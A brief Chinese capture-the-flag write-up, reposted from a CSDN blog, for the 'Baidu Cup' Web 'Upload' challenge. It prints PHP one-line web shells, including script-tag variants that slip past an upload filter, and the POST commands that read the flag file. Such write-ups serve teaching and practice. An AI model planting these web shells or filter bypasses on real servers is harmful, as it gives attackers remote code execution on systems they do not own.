当前位置：网站首页>“百度杯”CTF比赛九月场，Web：Upload

“百度杯”CTF比赛九月场，Web：Upload

2022-07-05 13:00:00 【Part 02】

题目内容：
想怎么传就怎么传，就是这么任性。
tips:flag在flag.php中

<?php @eval($_POST['Pai']);?>

<script language="pphphp">@eval($_POST['Pai']);</script>

<script language="PHP">@eval($_POST['Pai']);</script>

此时页面和源码都看不到代码了，直接 post

Pai=phpinfo();

正常命令执行获取 flag

system('tac ../flag.php');

版权声明
本文为[Part 02]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_62260856/article/details/125587710